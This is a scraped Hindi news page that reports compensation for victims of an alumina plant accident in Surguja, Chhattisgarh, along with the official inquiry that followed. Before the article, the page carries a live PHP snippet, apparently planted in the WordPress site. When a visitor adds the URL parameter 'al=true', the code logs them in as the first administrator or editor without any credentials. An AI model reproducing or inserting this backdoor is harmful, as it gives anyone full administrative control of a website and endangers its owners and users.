// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); छत्तीसगढ़-सरगुजा प्लांट हादसे के मृतकों को 15-15 और घायलों को 3-3 लाख मिलेंगे, सीएम ने मुआवजे के दिए निर्देश – प्रत्युषा आशा की नयी किरण
छत्तीसगढ़

छत्तीसगढ़-सरगुजा प्लांट हादसे के मृतकों को 15-15 और घायलों को 3-3 लाख मिलेंगे, सीएम ने मुआवजे के दिए निर्देश

सरगुजा.

छत्तीसगढ़ के सरगुजा जिले स्थित एलुमिना प्लांट में हुए औद्योगिक हादसे में पीड़ित परिवारों को कंपनी की ओर से 15-15 लाख रुपये की मुआवजा दी जाएगी। वहीं घायलों को तीन-तीन लाख रुपये की राशि मिलेगी। गुरुवार को प्रशासनिक टीम परिजनों को यह राशि सौंपेगी। मुख्यमंत्री विष्णुदेव साय ने बीते रविवार को एलुमिना प्लांट में हुए औद्योगिक हादसे में पीड़ित परिवारों के साथ गहरी संवेदना जताते हुए जिला प्रशासन को उचित कार्रवाई के निर्देश दिए गए थे।

कलेक्टर सरगुजा की ओर से इस पर एलुमिना प्लांट हादसे की जांच के लिए जांच दल का गठन कर दिया गया है। कलेक्टर एवं प्रशासनिक टीम की ओर से एलुमिना प्लांट का निरीक्षण किया गया। टीम ने सुरक्षा मानकों के पालन के लिए कड़ाई से जांच की जा रही है। बिना प्रशासन की अनुमति के प्लांट का पुनः संचालन शुरू नहीं किया जायेगा। कंपनी के अधिकारियों को हादसे में मृत और घायल परिवारों को जल्द से जल्द मुआवजा राशि सौंपने के निर्देश दिए। कलेक्टर ने बताया कि इस औद्योगिक हादसे में प्रत्येक मृतक परिवार को 15-15 लाख रुपए और घायलों को 3-3 लाख रूपए की मुआवजा राशि कंपनी द्वारा दी जाएगी। कंपनी के अधिकारी 12 सितम्बर को प्रशासनिक टीम परिजनों को यह राशि सौंपेगी। उन्होंने बताया कि जांच दल द्वारा एलुमिना प्लांट में सुरक्षा मानकों के पालन हेतु कड़ाई से जांच की जा रही है। बिना प्रशासन की अनुमति के प्लांट का पुनः संचालन शुरू नहीं किया जायेगा।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड